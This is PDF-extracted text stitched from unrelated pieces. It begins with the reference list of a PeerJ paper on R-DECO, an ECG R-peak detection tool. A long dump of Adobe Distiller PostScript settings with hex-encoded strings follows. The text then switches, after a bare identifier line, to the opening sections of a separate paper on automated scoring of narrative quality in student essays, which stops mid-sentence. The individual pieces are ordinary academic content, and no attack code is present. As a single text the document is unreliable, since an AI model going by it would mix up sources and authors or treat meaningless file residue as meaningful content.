Moeyersons J, Amoni M, Van Huffel S, Willems R, Varon C, R-DECO: An open-source MATLAB-based graphical user interface for the detection and correction of R-peaks, UNDER REVISION, 2019. https://gitlab.esat.kuleuven.be/biomed- public/r-deco. REFERENCES Arzeno NN, Deng ZD, Poon CS. 2008. Analysis of first-derivative based QRS detection algorithms. IEEE Transaction on Biomedical Engineering 55(2):478–484 DOI 10.1109/tbme.2007.912658. Badilini F. 1998. The ISHNE holter standard output file format. Annals of Noninvasive Electrocardiology 3(3):263–266. Chen S-W, Chen H-C, Chan H-L. 2006. A real-time QRS detection method based on moving-averaging incorporating with wavelet denoising. Computer Methods and Programs in Biomedicine 82(3):187–195 DOI 10.1016/j.cmpb.2005.11.012. De Chazal P, Heneghan C, Sheridan E, Reilly R, Nolan P, O’Malley M. 2003. Automated processing of the single-lead electrocardiogram for the detection of obstructive sleep apnoea. IEEE Transactions on Biomedical Engineering 50(6):686–696 DOI 10.1109/tbme.2003.812203. Dohare AK, Kumar V, Kumar R. 2014. An efficient new method for the detection of QRS in electrocardiogram. Computers & Electrical Engineering 40(5):1717–1730 DOI 10.1016/j.compeleceng.2013.11.004. Elgendi M, Eskofier B, Dokos S, Abbott D. 2014. Revisiting QRS detection methodologies for portable, wearable, battery-operated, and wireless ECG systems. PLOS ONE 9(1):e84018 DOI 10.1371/journal.pone.0084018. Fujii T, Nakano M, Yamashita K, Konishi T, Izumi S, Kawaguchi H, Yoshimoto M. 2013. Noise-tolerant instantaneous heart rate and R-peak detection using short-term autocorrelation for wearable healthcare systems. In: 35th Annual International Conference of the IEEE Engineering in Medicine and Biology Society (EMBC), Osaka. 7330–7333. Kemp B, Olivan J. 2003. European data format ‘plus’ (EDF+), an EDF alike standard format for the exchange of physiological data. Clinical Neurophysiology 114(9):1755–1761 DOI 10.1016/s1388-2457(03)00123-8. Kemp B, Värri A, Rosa AC, Nielsen KD, Gade J. 1992. A simple format for exchange of digitized polygraphic recordings. Electroencephalography and Clinical Neurophysiology 82(5):391–393. Kohler B, Hennig C, Orglmeister R. 2002. The principles of software QRS detection. IEEE Engineering in Medicine and Biology Magazine 21(1):42–57 DOI 10.1109/51.993193. Moody GB, Mark RG. 2001. The impact of the MIT-BIH arrhythmia database. IEEE Engineering in Medicine and Biology Magazine 20(3):45–50. Moody GB, Muldrow WK, Mark RG. 1984. A noise stress test for arrhythmia detectors. Computers in Cardiology 1:381–384. Moeyersons et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.226 19/20 https://gitlab.esat.kuleuven.be/biomed-public/r-deco https://gitlab.esat.kuleuven.be/biomed-public/r-deco http://dx.doi.org/10.1109/tbme.2007.912658 http://dx.doi.org/10.1016/j.cmpb.2005.11.012 http://dx.doi.org/10.1109/tbme.2003.812203 http://dx.doi.org/10.1016/j.compeleceng.2013.11.004 http://dx.doi.org/10.1371/journal.pone.0084018 http://dx.doi.org/10.1016/s1388-2457(03)00123-8 http://dx.doi.org/10.1109/51.993193 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.226 Niskanen J-P, Tarvainen MP, Ranta-Aho PO, Karjalainen PA. 2004. Software for advanced HRV analysis. Computer Methods and Programs in Biomedicine 76(1):73–81 DOI 10.1016/j.cmpb.2004.03.004. Pan J, Tompkins WJ. 1985. A real-time QRS detection algorithm. IEEE Transactions on Biomedical Engineering 32(3):230–236 DOI 10.1109/tbme.1985.325532. Pichot V, Roche F, Celle S, Barthélémy J-C, Chouchou F. 2016. HRVanalysis: a free software for analyzing cardiac autonomic activity. Frontiers in Physiology 7:557 DOI 10.3389/fphys.2016.00557. Rodenhauser A, Good WW, Zenger B, Tate J, Aras K, Burton B, MacLeod RS. 2018. PFEIFER: preprocessing framework for electrograms intermittently fiducialized from experimental recordings. Journal of Open Source Software 3(21):472 DOI 10.21105/joss.00472. Sharma LD, Sunkaria RK. 2016. A robust QRS detection using novel pre-processing techniques and kurtosis based enhanced efficiency. Measurement 87:194–204 DOI 10.1016/j.measurement.2016.03.015. Thomsen MB, Verduyn SC, Stengl M, Beekman JD, De Pater G, Van Opstal J, Volders PG, Vos MA. 2004. Increased short-term variability of repolarization predicts d-sotalol-induced torsades de pointes in dogs. Circulation 110(16):2453–2459 DOI 10.1161/01.cir.0000145162.64183.c8. Varon C, Caicedo A, Testelmans D, Buyse B, Huffel SV. 2015. A novel algorithm for the automatic detection of sleep apnea from single-lead ECG. IEEE Transactions on Biomedical Engineering 62(9):2269–2278 DOI 10.1109/tbme.2015.2422378. Vicente J, Johannesen L, Galeotti L, Strauss DG. 2013. ECGlab: user friendly ECG/VCG analysis tool for research environments. Computing in Cardiology 2013:775–778. Welch P. 1967. The use of fast Fourier transform for the estimation of power spectra: a method based on time averaging over short, modified periodograms. IEEE Transactions on Audio and Electroacoustics 15(2):70–73 DOI 10.1109/tau.1967.1161901. Moeyersons et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.226 20/20 http://dx.doi.org/10.1016/j.cmpb.2004.03.004 http://dx.doi.org/10.1109/tbme.1985.325532 http://dx.doi.org/10.3389/fphys.2016.00557 http://dx.doi.org/10.21105/joss.00472 http://dx.doi.org/10.1016/j.measurement.2016.03.015 http://dx.doi.org/10.1161/01.cir.0000145162.64183.c8 http://dx.doi.org/10.1109/tbme.2015.2422378 http://dx.doi.org/10.1109/tau.1967.1161901 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.226 R-DECO: an open-source Matlab based graphical user interface for the detection and correction of R-peaks Introduction Computational Methods Software Description Sample Run Potential of Future Growth Conclusion flink7 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_p2gfo6whijbf3nveq7bcobpptm ---- Towards Evaluating Narrative Quality In Student Writing Swapna Somasundaran1, Michael Flor1, Martin Chodorow2 Hillary Molloy3 Binod Gyawali1 Laura McCulla1 1Educational Testing Service, 660 Rosedale Road, Princeton, NJ 08541, USA 2Hunter College and the Graduate Center, CUNY, New York, NY 10065, USA 3Educational Testing Service, 90 New Montgomery Street, San Francisco, CA 94105, USA {ssomasundaran,mflor,hmolloy, bgyawali,LMcCulla}@ets.org martin.chodorow@hunter.cuny.edu Abstract This work lays the foundation for automated assessments of narrative quality in student writing. We first manually score essays for narrative-relevant traits and sub-traits, and measure inter-annotator agreement. We then explore linguistic features that are indicative of good narrative writing and use them to build an automated scoring system. Experiments show that our features are more effective in scoring specific aspects of narrative quality than a state-of-the-art feature set. 1 Introduction Narrative, which includes personal experiences and stories, real or imagined, is a medium of expression that is used from the very early stages of a child’s life. Narratives are also employed in various capac- ities in school instruction and assessment. For ex- ample, the Common Core State Standards, an ed- ucational initiative in the United States that details requirements for student knowledge in grades K- 12, employs literature/narratives as one of its three language arts genres. With the increased focus on automated evaluation of student writing in educa- tional settings (Adams, 2014), automated methods for evaluating narrative essays at scale are becoming increasingly important. Automated scoring of narrative essays is a chal- lenging area, and one that has not been explored ex- tensively in NLP research. Previous work on auto- mated essay scoring has focused on informational, argumentative, persuasive and source-based writing constructs (Stab and Gurevych, 2017; Nguyen and Litman, 2016; Farra et al., 2015; Somasundaran et al., 2014; Beigman Klebanov et al., 2014; Shermis and Burstein, 2013). Similarly, operational essay scoring engines (Attali and Burstein, 2006; Elliot, 2003) are geared towards evaluating language profi- ciency in general. In this work, we lay the ground- work and present the first results for automated scor- ing of narrative essays, focusing on narrative quality. One of the challenges in narrative quality anal- ysis is the scarcity of scored essays in this genre. We describe a detailed manual annotation study on scoring student essays along multiple dimensions of narrative quality, such as narrative development and narrative organization. Using a scoring rubric adapted from the U.S. Common Core State Stan- dards, we annotated 942 essays written for 18 differ- ent essay-prompts by students from three different grade levels. This data set provides a variety of story types and language proficiency levels. We measured inter-annotator agreement to understand reliability of scoring stories for traits (e.g., development) as well as sub-traits (e.g., plot development and the use of narrative techniques). A number of techniques for writing good stories are targeted by the scoring rubrics. We implemented a system for automatically scoring different traits of narratives, using linguistic features that capture some of those techniques. We investigated the effec- tiveness of each feature for scoring narrative traits and analyzed the results to identify sources of errors. The main contributions of this work are as fol- lows: (1) To the best of our knowledge, this is the first detailed annotation study on scoring narra- tive essays for different aspects of narrative quality. 91 Transactions of the Association for Computational Linguistics, vol. 6, pp. 91–106, 2018. Action Editor: Alexander Clark. Submission batch: 7/2017; Revision batch: 10/2017; Published 2/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. (2) We present an automated system for scoring nar- rative quality, with linguistic features specific to en- coding aspects of good story-telling. This system outperforms a state-of-the-art essay-scoring system. (3) We present analyses of trait and overall scoring of narrative essays, which provide insights into the aspects of narratives that are easy/difficult for hu- mans and machines to evaluate. 2 Related Work 2.1 Narrative assessments Researchers have approached manual assessments of creative writing in a variety of ways. The “consensual assessment technique” (Amabile, 1982; Broekkamp et al., 2009) evaluates students’ creative writing on criteria such as creativity, originality and technical quality. Consensus scoring is used, but the genre is considered to be too subjective for close agreement between scorers. Story-telling in children has been studied and evaluated using a number of techniques. For ex- ample, the Test of Narrative Language (Gillam and Pearson, 2004) is a standardized, picture-based, norm-referenced measure of narrative ability, used to identify language disabilities. Stein and Glenn (1979) used a story-schema approach to evaluate story recall in school children. Miller and Chapman (1985) adapted it to score story re-telling, mainly for clinical purposes. Similarly, narrative re-telling is recorded and analyzed for length, syntax, cohesion, and story grammar in the Strong Narrative Assess- ment Procedure (Strong et al., 1998). The Index of Narrative Complexity (Petersen et al., 2008) scores oral narratives on several dimensions and is used to study the effectiveness of clinical interventions. Olinghouse and Leaird (2009) used picture- prompts for eliciting narratives from about 200 stu- dents at the 2nd and 4th grade levels. The stories were evaluated for organization, development and creative vocabulary, but the study focused on vocab- ulary characteristics at different grade levels. McK- eough et al. (2006) studied 150 student narratives in order to compare talented and average writers. Halpin and Moore (2006) analyzed students’ re- telling of exemplar stories. They focused on event extraction, with the final goal of providing advice in an interactive story-telling environment. Passonneau et al. (2007) annotated oral retellings of the same story on three consecutive days in order to study and model children’s comprehension. 2.2 Narrative Analysis in Computational Linguistics Research on narratives in Computational Linguistics has employed fables, fairy tales, and literary texts, aiming at representing, understanding and extract- ing information, e.g., Charniak (1972). Goyal et al. (2010) analyzed Aesop’s fables, producing auto- matic plot-unit representations (Lehnert, 1981) with a task-specific knowledge base of affect. Character traits and personas in stories have also been analyzed. For example, Elsner (2012) pro- posed a rich representation of story-characters for the purpose of summarizing and representing nov- els. Bamman et al. (2014) automatically inferred latent character types in English novels. Valls- Vargas et al. (2014) extracted characters and roles from Russian folk tales, based on their actions. Chaturvedi et al. (2015) analyzed short stories for characters’ desires and built a system to recognize desire fulfillment, using textual entailment. Researchers have also studied social networks and have modeled relationships in stories (Elson et al., 2010; Celikyilmaz et al., 2010). Agarwal et al. (2013) modeled character interactions from Alice in Wonderland for the purpose of social network anal- ysis. Chaturvedi et al. (2016) modeled character relationships in novels, using structured prediction. Wiebe (1994) proposed a method for tracking psychological points of view in narratives, looking at private states and subjective sentences. Oves- dotter Alm and Sproat (2005) studied emotional se- quencing and trajectories in 22 Grimm’s fairy tales. Ware et al. (2011) analyzed dimensions of conflict in four simple, constructed stories, with the goal of evaluating story content. Similarly, Swanson et al. (2014) analyzed blog narratives for narrative clause sub-types such as orientation, action and evaluation. Reagan et al. (2016) used sentiment analysis to gen- erate emotional profiles for English novels. NLP methods have also been used for modeling and understanding narrative structures (Finlayson, 2012; Elson, 2012). See Finlayson (2013) and Mani (2012) for detailed literature surveys. One important aspect of a narrative is that it 92 conveys a sequence of events (Fludernik, 2009; Almeida, 1995). Chambers and Jurafsky (2009; 2008) presented techniques for the automatic acqui- sition of event chains and event schemas (Chambers, 2013), which are related to earlier notions of scripts as prepackaged chunks of knowledge (Schank and Abelson, 1977). This line of research has received a great deal of attention (Nguyen et al., 2015; Bal- asubramanian et al., 2013; Jans et al., 2012; McIn- tyre and Lapata, 2010). For narratives, Ouyang and McKeown (2015) focused on automatic detection of compelling events. Bogel et al. (2014) worked on extraction and temporal ordering of events in narra- tives. Based on the ‘Narrative Cloze Test’ (Chambers and Jurafsky, 2008), Mostafazadeh et al. (2016) pre- sented a framework for evaluating story understand- ing algorithms, the ‘Story Cloze Test’, whose goal is to predict a held-out continuation of a short story. Our research differs significantly from previous work. We aim to evaluate, on an integer scale, the quality of narratives in student-generated essays. In- sights from previous work on narrative analysis can be useful for our purposes if they capture narrative techniques employed by student writers, and if they correlate with scores representing narrative quality. It is still an open question whether an elaborate rep- resentation and understanding of the story is needed for evaluating student writing, or whether encod- ing features that capture different narrative aspects might be sufficient. Further, depending on the type of story, not all aspects of narrative analysis may come into play. For example, plot construction and narrative elements such as conflict may be central to creating a hypothetical story about an antique trunk, but not so much in a personal story about a travel experience. To the best of our knowledge, this work makes a first attempt at investigating the evaluation of narrative quality using automated methods. 2.3 Automated essay scoring There are a number of automated essay scoring (AES) systems, many of which are used oper- ationally, such as e-raterr (Attali and Burstein, 2006), Intellimetric (Elliot, 2003), the Intelligent Es- say Assessor (Landauer et al., 2003) and Project Es- say Grade (Page, 1994). However, these previous studies have not been focused on narratives. In a somewhat related study to this one, Somasun- daran et al. (2015) scored oral narratives that were generated by international students in response to a series of pictures. Some of the features used in that study overlap with our work due to the overlap in the genre; however, their focus was on scoring the response for language proficiency. Graph features, which we have used in this work, have been shown to be effective in capturing idea development in es- says (Somasundaran et al., 2016). This work also employs graph features, but it is one of the many we explore for encoding the various linguistic phenom- ena that characterize good narratives. 3 Data Our data comprises narrative essays written by school students in the Criterion R© program1, an on- line writing evaluation service from Educational Testing Service. It is a web-based, instructor-led writing tool that helps students plan, write and revise their essays. Narrative essays were obtained from grade levels 7, 10 and 12. Each essay was written in response to one of 18 story-telling prompts related to personal experiences, hypothetical situations, or fictional stories. Below are some example prompts: [Personal Experience] There are moments in everyone’s lives when they feel pride and accomplishment after completing a challenging task. Write a story about your proudest moment. [Hypothetical Situation] Pretend that one morning you wake up and find out that you’ve become your teacher for a day! What happened? What do you do? Do you learn anything? Write a story about what happens. Use your imagination! [Fictional Story] Throughout the years, many have placed mes- sages in sealed bottles and dropped the bottles into the ocean where they eventually washed up on foreign shores. Occasion- ally the finder has even contacted the sender. Write a story about finding your own message in a bottle. The average essay length in our data is 320 words, with a range of 3 to 1310 words and a standard devi- ation of 195. A sample essay, “Message in a bottle”, in response to the fiction story prompt above is pre- sented below: Last year, I went back to my hometown. There was a big beautiful beach on which I had often played as a child. Nevertheless, when I went to the beach, it changed. I looked a great deal of trash, and 1https://criterion.ets.org/criterion 93 many animal disappeared. Without original breath- taking scene, there had been destroyed very well. All of a sudden, I watched a bottle When I walked on the beach. I opened the bottle with my cu- riosity. There was a message in the bottle. The mes- sage was “Whoever you are, please help this beach. We need more clean beach to survive.” I was sur- prised that this message should be from the sea crea- ture. They need humans’ help, or they would die. Therefore, I persuaded the other people who live there to clean the beach immediately. They all agreed to come and to help those animals. Finally, with a lot of people’s help, the beach became beau- tiful as before. I thought that those who under the sea were very comfortable and happy to live a clean surroundings. 4 Scoring Narrative Essays Our work focuses on automatically evaluating and scoring the proficiency of narrative construction in student essays. Therefore, we use a rubric2 created by education experts and teachers, and presented by Smarter Bal- anced, an assessment aligned to U.S. State Standards for grades K-12. 4.1 Trait Scoring The scoring rubric provides guidelines for scor- ing essays along three traits (dimensions): Pur- pose/Organization (hereafter, referred to as Organi- zation or Org.), Development/Elaboration (Develop- ment or Dev.) and Conventions (or Conv.). Each of the dimensions is described below. 4.1.1 Organization Organization is concerned with the way a story is arranged in general. It focuses on event coherence, on whether the story has a coherent start and end- ing, and whether there is a plot to hold all the pieces of the story together. This dimension is judged on a scale of 1-4 integer score points, with 4 being the highest score. The rubric provides the following cri- teria for an essay of score point 4 in terms of five as- pects or sub-traits: “The organization of the narrative is fully sustained and the focus is clear and maintained throughout: 1. an effective Plot; 2. effectively establishes 2 https://portal.smarterbalanced.org/ library/en/performance-task-writing- rubric-narrative.pdf Character/Setting/POV; 3. consistent use of a variety of Transitioning strategies; 4. natural, logical Sequencing of events; 5. effective Opening/Closing.” An essay is judged non-scorable if it is insuffi- cient, written in a language other than English, off- topic, or off-purpose. Such essays are assigned a score of 0 in our scheme. 4.1.2 Development Development focuses on how the story is devel- oped. It evaluates whether the story provides vivid descriptions, and whether there is character devel- opment. This dimension is also judged on a scale of 1-4 integer score points, with 4 being the high- est score. As in the scoring of Organization, in our scheme, non-scorable essays are assigned a 0 score for Development. The rubric provides the following criteria 